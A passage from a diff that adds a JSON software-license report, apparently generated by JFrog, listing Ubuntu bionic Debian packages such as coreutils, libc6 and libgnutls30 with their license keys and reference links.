"http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:bzip2:1.0.6-8.1ubuntu0.2", + "component_name": "ubuntu:bionic:bzip2", + "version": "1.0.6-8.1ubuntu0.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:bzip2", + "licenses": [ + { + "key": "bzip2-1.0.6", + "link": "https://github.com/asimonov-im/bzip2/blob/master/LICENSE", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:ca-certificates:20230311ubuntu0.18.04.1", + "component_name": "ubuntu:bionic:ca-certificates", + "version": "20230311ubuntu0.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:ca-certificates", + "licenses": [ + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MPL-2.0", + "link": "http://opensource.org/licenses/MPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:coreutils:8.28-1ubuntu1", + "component_name": "ubuntu:bionic:coreutils", + "version": "8.28-1ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:coreutils", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:dash:0.5.8-2.10", + "component_name": "ubuntu:bionic:dash", + "version": "0.5.8-2.10", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:dash", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:debconf:1.5.66ubuntu1", + "component_name": "ubuntu:bionic:debconf", + "version": "1.5.66ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:debconf", + "licenses": [ + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:debianutils:4.8.4", + "component_name": "ubuntu:bionic:debianutils", + "version": "4.8.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:debianutils", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:diffutils:1:3.6-1", + "component_name": "ubuntu:bionic:diffutils", + "version": "1:3.6-1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:diffutils", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:dpkg:1.19.0.5ubuntu2.4", + "component_name": "ubuntu:bionic:dpkg", + "version": "1.19.0.5ubuntu2.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:dpkg", + "licenses": [ + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:e2fsprogs:1.44.1-1ubuntu1.4", + "component_name": "ubuntu:bionic:e2fsprogs", + "version": "1.44.1-1ubuntu1.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:e2fsprogs", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:fdisk:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:fdisk", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:fdisk", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:findutils:4.6.0+git+20170828-2", + "component_name": "ubuntu:bionic:findutils", + "version": "4.6.0+git+20170828-2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:findutils", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:gcc-8-base:8.4.0-1ubuntu1~18.04", + "component_name": "ubuntu:bionic:gcc-8-base", + "version": "8.4.0-1ubuntu1~18.04", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:gcc-8-base", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ZLIB", + "link": "http://www.opensource.org/licenses/Zlib", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:gpgv:2.2.4-1ubuntu1.6", + "component_name": "ubuntu:bionic:gpgv", + "version": "2.2.4-1ubuntu1.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:gpgv", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-or-later", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:grep:3.1-2build1", + "component_name": "ubuntu:bionic:grep", + "version": "3.1-2build1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:grep", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:gzip:1.6-5ubuntu1.2", + "component_name": "ubuntu:bionic:gzip", + "version": "1.6-5ubuntu1.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:gzip", + "licenses": [ + { + "key": "GPL-1.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:hostname:3.20", + "component_name": "ubuntu:bionic:hostname", + "version": "3.20", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:hostname", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:init-system-helpers:1.51", + "component_name": "ubuntu:bionic:init-system-helpers", + "version": "1.51", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:init-system-helpers", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libacl1:2.2.52-3build1", + "component_name": "ubuntu:bionic:libacl1", + "version": "2.2.52-3build1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libacl1", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libapt-pkg5.0:1.6.17", + "component_name": "ubuntu:bionic:libapt-pkg5.0", + "version": "1.6.17", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libapt-pkg5.0", + "licenses": [ + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libattr1:1:2.4.47-2build1", + "component_name": "ubuntu:bionic:libattr1", + "version": "1:2.4.47-2build1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libattr1", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libaudit-common:1:2.8.2-1ubuntu1.1", + "component_name": "ubuntu:bionic:libaudit-common", + "version": "1:2.8.2-1ubuntu1.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libaudit-common", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libaudit1:1:2.8.2-1ubuntu1.1", + "component_name": "ubuntu:bionic:libaudit1", + "version": "1:2.8.2-1ubuntu1.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libaudit1", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libblkid1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:libblkid1", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libblkid1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libbz2-1.0:1.0.6-8.1ubuntu0.2", + "component_name": "ubuntu:bionic:libbz2-1.0", + "version": "1.0.6-8.1ubuntu0.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libbz2-1.0", + "licenses": [ + { + "key": "bzip2-1.0.6", + "link": "https://github.com/asimonov-im/bzip2/blob/master/LICENSE", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libc-bin:2.27-3ubuntu1.6", + "component_name": "ubuntu:bionic:libc-bin", + "version": "2.27-3ubuntu1.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libc-bin", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause-UC", + "link": "http://www.freebsd.org/copyright/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "IETF", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Intel", + "link": "http://opensource.org/licenses/Intel", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT-CMU", + "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Spencer-94", + "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libc6:2.27-3ubuntu1.6", + "component_name": "ubuntu:bionic:libc6", + "version": "2.27-3ubuntu1.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libc6", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause-UC", + "link": "http://www.freebsd.org/copyright/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "IETF", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Intel", + "link": "http://opensource.org/licenses/Intel", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT-CMU", + "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Spencer-94", + "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libcap-ng0:0.7.7-3.1", + "component_name": "ubuntu:bionic:libcap-ng0", + "version": "0.7.7-3.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libcap-ng0", + "licenses": [ + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libcom-err2:1.44.1-1ubuntu1.4", + "component_name": "ubuntu:bionic:libcom-err2", + "version": "1.44.1-1ubuntu1.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libcom-err2", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libdb5.3:5.3.28-13.1ubuntu1.1", + "component_name": "ubuntu:bionic:libdb5.3", + "version": "5.3.28-13.1ubuntu1.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libdb5.3", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Sleepycat", + "link": "http://www.opensource.org/licenses/Sleepycat", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libdebconfclient0:0.213ubuntu1", + "component_name": "ubuntu:bionic:libdebconfclient0", + "version": "0.213ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libdebconfclient0", + "licenses": [ + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libexpat1:2.2.5-3ubuntu0.9", + "component_name": "ubuntu:bionic:libexpat1", + "version": "2.2.5-3ubuntu0.9", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libexpat1", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libext2fs2:1.44.1-1ubuntu1.4", + "component_name": "ubuntu:bionic:libext2fs2", + "version": "1.44.1-1ubuntu1.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libext2fs2", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libfdisk1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:libfdisk1", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libfdisk1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libffi6:3.2.1-8", + "component_name": "ubuntu:bionic:libffi6", + "version": "3.2.1-8", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libffi6", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libgcc1:1:8.4.0-1ubuntu1~18.04", + "component_name": "ubuntu:bionic:libgcc1", + "version": "1:8.4.0-1ubuntu1~18.04", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libgcc1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ZLIB", + "link": "http://www.opensource.org/licenses/Zlib", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libgcrypt20:1.8.1-4ubuntu1.3", + "component_name": "ubuntu:bionic:libgcrypt20", + "version": "1.8.1-4ubuntu1.3", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libgcrypt20", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libgmp10:2:6.1.2+dfsg-2ubuntu0.1", + "component_name": "ubuntu:bionic:libgmp10", + "version": "2:6.1.2+dfsg-2ubuntu0.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libgmp10", + "licenses": [ + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libgnutls30:3.5.18-1ubuntu1.6", + "component_name": "ubuntu:bionic:libgnutls30", + "version": "3.5.18-1ubuntu1.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libgnutls30", + "licenses": [ + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GFDL-1.3-no-invariants-or-later", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0-only", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Mup", + "link": "https://fedoraproject.org/wiki/Licensing/Mup", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libgpg-error0:1.27-6", + "component_name": "ubuntu:bionic:libgpg-error0", + "version": "1.27-6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libgpg-error0", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libhogweed4:3.4.1-0ubuntu0.18.04.1", + "component_name": "ubuntu:bionic:libhogweed4", + "version": "3.4.1-0ubuntu0.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libhogweed4", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libidn2-0:2.0.4-1.1ubuntu0.2", + "component_name": "ubuntu:bionic:libidn2-0", + "version": "2.0.4-1.1ubuntu0.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libidn2-0", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": 